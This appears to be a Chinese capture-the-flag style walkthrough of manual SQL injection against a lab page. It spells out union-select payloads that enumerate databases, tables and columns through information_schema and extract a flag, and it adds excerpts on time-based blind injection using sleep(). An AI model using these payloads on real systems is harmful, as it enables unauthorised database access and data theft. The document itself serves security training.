**注:這裡還要利用到了乙個函式group_concat( ),意思是將查詢的結果併排 拼接一起展示,不然輸出點只能顯示乙個表名或者字段
1.利用and1=1 顯示正常, and 1=2 顯示錯誤頁面。證明有注入點
2。order by 語句查詢有幾個字段,為了後面使用聯合查詢
例如,order by 4 出錯,order by 3 顯示正確,判斷為3個字段
3.使用union 聯合查詢 顯錯點,輸出點
語句:and 1=2 union select 1,2,3
顯錯點為2,3
4.查詢當前庫名
語句:and 1=2 union select 1,database(),3
當前庫名為security
5。查表名,利用當前庫名查系統表
語句:and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=「security」
這裡利用到了乙個函式group_concat( ),意思是將查詢的結果併排 拼接一起展示
不然輸出點只能顯示乙個表名
6。查字段,利用表名查系統表
語句:and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=「zkaq」
7.查表內的資訊
語句:and 1=2 union select 1,group_concat(flag),group_concat(zkaq) from zkaq
我們想要的表內的所有資訊如圖展示
我們也得到了我們需要的資訊:flag為:zkaq-err0rbas4d,
一次簡單的手工注入成功
一次簡單手工注入
注入點http news.php?newsid 18 收集了下ip,不能sqlmap了,就只能手工了。經典 and 1 1 1 2 一直報錯,感覺是被過濾了,後面使用注釋符也不行 使用union select 1,2,3也報錯,確定不了字段數。成功payload union select 1,2,c...
一次簡單SQL注入
一次簡單sql注入 id 遇見id 上去乙個單引號 報錯,回顯判斷是mysql資料庫 and 1 1正常 and 1 2 不正常 數字型注入點沒錯了,還沒有waf 開始下手 order by 判斷當前注入點有25個字段 回顯 2 和 10 用database 替換2 version 替換10 開始爆...
一次手工和工具的延時注入(時間注入)
利用函式sleep 讓伺服器休眠,通過休眠時間判斷執行的語句對錯,從而得到我們想要的資訊 1,判斷當前庫名的長度 and if length database 8,0,sleep 5 0 結果 8時網頁沒睡眠,可以判斷當前庫名有8個字元 2,猜庫名 and if ascii substr datab...